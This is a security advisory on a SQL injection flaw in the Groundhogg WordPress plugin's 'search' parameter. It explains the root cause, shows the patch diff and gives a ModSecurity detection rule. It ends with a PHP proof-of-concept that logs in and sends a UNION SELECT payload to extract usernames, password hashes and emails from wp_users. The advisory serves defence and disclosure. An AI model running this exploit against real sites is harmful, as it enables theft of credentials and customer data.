Atomic Edge analysis of CVE-2026-13331:
This vulnerability allows authenticated attackers with marketer-level access or above to perform SQL injection through the ‘search’ parameter in the Groundhogg plugin. The flaw exists in the steps.php file where user-supplied search input is directly concatenated into SQL queries without proper parameterization or escaping. The CVSS score of 6.5 indicates medium-high severity.
The root cause lies in the `get_steps()` method within `/groundhogg/db/steps.php` (lines 213-267). This method constructs a SQL query by taking the ‘search’ parameter from user input and passing it directly to `generate_search()`. The `generate_search()` function in `db.php` (lines 334-342) then builds a LIKE clause by concatenating the search string with `$wpdb->esc_like()` wrapping. However, the `generate_where()` function (lines 399-418) processes the resulting array by directly inserting values into SQL strings without prepared statements. The critical issue is that `esc_like()` only escapes LIKE special characters (%, _) but does not prevent SQL injection because the value is still concatenated into the query structure without parameterization.
Exploitation requires an authenticated user with the ‘marketer’ role or higher. The attacker sends a request to the admin-ajax.php endpoint with an action that triggers the `get_steps()` method, passing a malicious ‘search’ parameter. The payload bypasses `esc_like()` by using SQL injection techniques that don’t rely on LIKE wildcard characters. For example, an attacker can inject `’ UNION SELECT … — -` to append arbitrary SQL. The `generate_where()` function processes this input and inserts it directly into the WHERE clause, allowing the injection to execute.
The patch removes the vulnerable `get_steps()` method entirely and replaces it with a new implementation using the `Table_Query` class. The `generate_search()` method is refactored to use `Where::contains()` which properly parameterizes queries. The `generate_where()` method now uses `Where::in()`, `Where::like()`, and `Where::equals()` methods that leverage prepared statements. The `construct_request_fields()` method in `legacy-contact-query.php` adds whitelist validation (`has_column()`) and uses `$wpdb->prepare()` for column selection. These changes ensure all user-supplied data is properly parameterized, preventing SQL injection.
Successful exploitation allows an attacker to extract sensitive information from the WordPress database. This includes user credentials (hashed passwords), customer data stored in Groundhogg’s CRM tables, and other potentially sensitive business information. The attacker can execute arbitrary SQL queries against the database, potentially leading to complete data compromise.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/groundhogg/db/db.php
+++ b/groundhogg/db/db.php
@@ -8,6 +8,7 @@
use GroundhoggContact;
use GroundhoggDBQueryFilterException;
use GroundhoggDBQueryFilters;
+use GroundhoggDBQueryQuery;
use GroundhoggDBQueryTable_Query;
use GroundhoggDBQueryWhere;
use GroundhoggDB_Object;
@@ -328,15 +329,14 @@
* @return string
*/
public function generate_search( $s = '' ) {
- global $wpdb;
- $where_args = array();
+ $where = new Where( new Table_Query( $this ), "OR" );
foreach ( $this->get_searchable_columns() as $column ) {
- $where_args[ $column ] = "%" . $wpdb->esc_like( $s ) . "%";
+ $where->contains( $column, $s );
}
- return $this->generate_where( $where_args, "OR" );
+ return "$where";
}
/**
@@ -394,27 +394,24 @@
*/
public function generate_where( $args = array(), $relationship = "AND" ) {
- $where = array();
+ $where = new Where( new Table_Query( $this ), $relationship );
+
if ( ! empty( $args ) && is_array( $args ) ) {
foreach ( $args as $key => $value ) {
if ( is_array( $value ) ) {
- $where[] = "$key IN (" . maybe_implode_in_quotes( $value ) . ")";
+ $where->in( $key, $value );
} else {
- if ( is_string( $value ) ) {
- $value = "'" . $value . "'";
- }
-
- if ( strpos( $value, '%' ) !== false ) {
- $where[] = $key . " LIKE " . $value;
+ if ( str_contains( $value, '%' ) ) {
+ $where->like( $key, $value );
} else {
- $where[] = $key . " = " . $value;
+ $where->equals( $key, $value );
}
}
}
}
- return implode( " {$relationship} ", $where );
+ return "$where";
}
--- a/groundhogg/db/steps.php
+++ b/groundhogg/db/steps.php
@@ -3,6 +3,9 @@
namespace GroundhoggDB;
// Exit if accessed directly
+use GroundhoggDBQueryTable_Query;
+use GroundhoggStep;
+
if ( ! defined( 'ABSPATH' ) ) {
exit;
}
@@ -154,23 +157,24 @@
/**
* Delete steps when a funnel is deleted...
*
- * @param bool|int $id Funnel ID
+ * @param bool|int $funnel_id Funnel ID
*
* @return bool|false|int
*/
- public function delete_steps( $id = false ) {
- if ( empty( $id ) ) {
+ public function delete_steps( $funnel_id = false ) {
+
+ if ( empty( $funnel_id ) ) {
return false;
}
- $steps = $this->get_steps( array( 'funnel_id' => $id ) );
+ $query = new Table_Query( $this );
+ $query->where( 'funnel_id', $funnel_id );
+ $steps = $query->get_objects( Step::class );
- $result = 0;
+ $result = false;
- if ( $steps ) {
- foreach ( $steps as $step ) {
- $result = $this->delete( $step->ID );
- }
+ foreach ( $steps as $step ) {
+ $result = $this->delete( $step->ID );
}
return $result;
@@ -209,61 +213,6 @@
return parent::get_by( $field, $value );
}
-
- /**
- * Retrieve steps from the database
- *
- * @access public
- * @since 2.1
- */
- public function get_steps( $data = array(), $order = 'step_order' ) {
-
- global $wpdb;
-
- if ( ! is_array( $data ) ) {
- return false;
- }
-
- $data = (array) $data;
-
- $extra = '';
-
- if ( isset( $data['search'] ) ) {
-
- $extra .= sprintf( " AND (%s)", $this->generate_search( $data['search'] ) );
-
- }
-
- // Initialise column format array
- $column_formats = $this->get_columns();
-
- // Force fields to lower case
- $data = array_change_key_case( $data );
-
- // White list columns
- $data = array_intersect_key( $data, $column_formats );
-
- $where = $this->generate_where( $data );
-
- if ( empty( $where ) ) {
-
- $where = "1=1";
-
- }
-
- return $wpdb->get_results( "SELECT * FROM $this->table_name WHERE $where $extra ORDER BY `$order` ASC" );
- }
-
- /**
- * Count the total number of steps in the database
- *
- * @access public
- * @since 2.1
- */
- public function count( $args = array() ) {
- return count( $this->get_steps( $args ) );
- }
-
/**
* Create the table
*
--- a/groundhogg/groundhogg.php
+++ b/groundhogg/groundhogg.php
@@ -3,7 +3,7 @@
* Plugin Name: Groundhogg
* Plugin URI: https://www.groundhogg.io/?utm_source=wp-plugins&utm_campaign=plugin-uri&utm_medium=wp-dash
* Description: CRM and marketing automation for WordPress
- * Version: 4.5.5
+ * Version: 4.5.6
* Author: Groundhogg Inc.
* Author URI: https://www.groundhogg.io/?utm_source=wp-plugins&utm_campaign=author-uri&utm_medium=wp-dash
* Text Domain: groundhogg
@@ -24,7 +24,7 @@
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
-define( 'GROUNDHOGG_VERSION', '4.5.5' );
+define( 'GROUNDHOGG_VERSION', '4.5.6' );
define( 'GROUNDHOGG_PREVIOUS_STABLE_VERSION', '4.5.3' );
define( 'GROUNDHOGG__FILE__', __FILE__ );
--- a/groundhogg/includes/legacy-contact-query.php
+++ b/groundhogg/includes/legacy-contact-query.php
@@ -746,11 +746,30 @@
*
*/
protected function construct_request_fields() {
+
+ global $wpdb;
+
if ( $this->query_vars['count'] ) {
return "COUNT($this->table_name.$this->primary_key) AS count";
}
- return "$this->table_name.{$this->query_vars['select']}";
+ $select = $this->query_vars['select'];
+
+ if ( is_array( $select ) ) {
+
+ $columns = array_filter( $select, fn ( $column ) => is_string( $column ) && $this->gh_db_contacts->has_column( $column ) );
+
+ if ( ! empty( $columns ) ) {
+ $columns = array_map( fn ( $column ) => $wpdb->prepare( '%i.%i', $this->table_name, $column ), $columns );
+ return implode( ',', $columns );
+ }
+ }
+
+ if ( is_string( $select ) && $this->gh_db_contacts->has_column( $select ) ) {
+ $wpdb->prepare( '%i.%i', $this->table_name, $select );
+ }
+
+ return "$this->table_name.*";
}
/**
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-13331
# Targets SQL injection via 'search' parameter in Groundhogg admin-ajax.php
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-13331 - Groundhogg SQLi attempt via AJAX search parameter',severity:'CRITICAL',tag:'CVE-2026-13331',tag:'wordpress',tag:'groundhogg'"
SecRule ARGS_POST:action "@rx ^groundhogg_" "chain"
SecRule ARGS_POST:search "@rx (?i)(bunionb|bselectb|bdropb|bdeleteb|binsertb|bupdateb|bintob|bfileb|bconcatb|borders+byb|b--s*$|b#s*$|b;s*$|'/*|*/|bexec(s|()|bxp_cmdshellb|bsleepb|bbenchmarkb|bload_fileb|binformation_schemab)" "chain"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-13331 - Groundhogg <= 4.5.5 - Authenticated (Marketer+) SQL Injection via 'search' Parameter
$target_url = 'http://example.com'; // Change this to target URL
$username = 'attacker'; // Change to valid marketer+ credentials
$password = 'password'; // Change to valid password
// Step 1: Authenticate and get cookies
$ch = curl_init($target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
// Step 2: Craft SQL injection payload
// The 'search' parameter is processed by get_steps() which calls generate_search()
// The injection bypasses esc_like() by closing the LIKE string and adding UNION
$payload = "1') UNION SELECT user_login,user_pass,user_email FROM wp_users WHERE ('1'='1";
// Step 3: Determine the AJAX action that triggers get_steps()
// You may need to identify the correct action from Groundhogg's code
$ajax_action = 'groundhogg_get_steps'; // Example - adjust based on actual action
// Step 4: Send the malicious request
$ch = curl_init($target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'action' => $ajax_action,
'search' => $payload
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);
curl_close($ch);
echo "Response: " . $response . "n";
// Clean up
unlink('cookies.txt');
